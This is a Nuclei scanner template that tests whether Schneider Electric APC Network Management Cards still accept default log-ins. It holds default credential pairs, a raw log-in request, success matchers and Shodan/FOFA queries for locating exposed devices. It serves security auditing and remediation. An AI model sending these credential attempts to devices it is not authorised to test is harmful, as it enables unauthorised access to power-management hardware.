漏洞描述
This template detects Schneider Electric APC Network Management Cards that still accept default credentials.
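# Nuclei template: reports APC Network Management Cards whose web log-on form
# still accepts one of the listed default username/password pairs.
# NOTE(review): the `# digest:` line at the end of this file was computed over
# the original template text; it has to be regenerated after any edit here.
id: apc-nmc-default-login

info:
  name: Schneider Electric APC NMC - Default Login
  author: x-stp
  severity: high
  description: |
    Schneider Electric APC Network Management Cards with default credentials.
  remediation: |
    Replace the default credentials on every Network Management Card account
    and limit access to the management interface to trusted management networks.
  reference:
    - https://www.apc.com/us/en/faqs/FA156047/
  classification:
    cwe-id: CWE-522
    cvss-score: 8.6
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    # Quoted so the `*` wildcards and colons can never be read as YAML syntax.
    cpe: 'cpe:2.3:o:schneider-electric:network_management_card_firmware:*:*:*:*:*:*:*:*'
  metadata:
    verified: true
    # pitchfork pairs the payload lists by index (apc/apc, admin/admin), so the
    # template sends at most two requests per host, not four.
    max-request: 2
    shodan-query: 'title:"APC | Log On"'
    fofa-query: 'title="APC | Log On"'
    product: apc-network-management-card
    vendor: schneider-electric
  tags: apc,default-login,iot,ups,vuln

http:
  # The empty line inside the raw request separates the headers from the
  # form-encoded body; without it the credentials would be sent as a header.
  - raw:
      - |
        POST /Forms/login1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login_username={{username}}&login_password={{password}}&prefLanguage=00000000&submit=Log+On

    attack: pitchfork
    payloads:
      username:
        - apc
        - admin
      password:
        - apc
        - admin

    # Stop after the first pair that matches, so a device is not sent further
    # log-on attempts once the finding is already established.
    stop-at-first-match: true

    # All three matchers must hold: a 303 redirect into /NMC/ together with an
    # APC-prefixed cookie being set in the same response.
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "(?i)Location: .*/NMC/"

      - type: regex
        part: header
        regex:
          - "(?i)Set-Cookie: APC[^=]+=[^;]+"

      - type: status
        status:
          - 303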
# digest: 4a0a0047304502210085aaf1ae1957fdae33cdc93620586078139eb1c7c211da70a3ea7054787c517702201bf6dc15b67a36399b346ce69298334e05becce166e2fd6d4591f52a99aa48f6:922c64590222798bb761d5b6d8e72950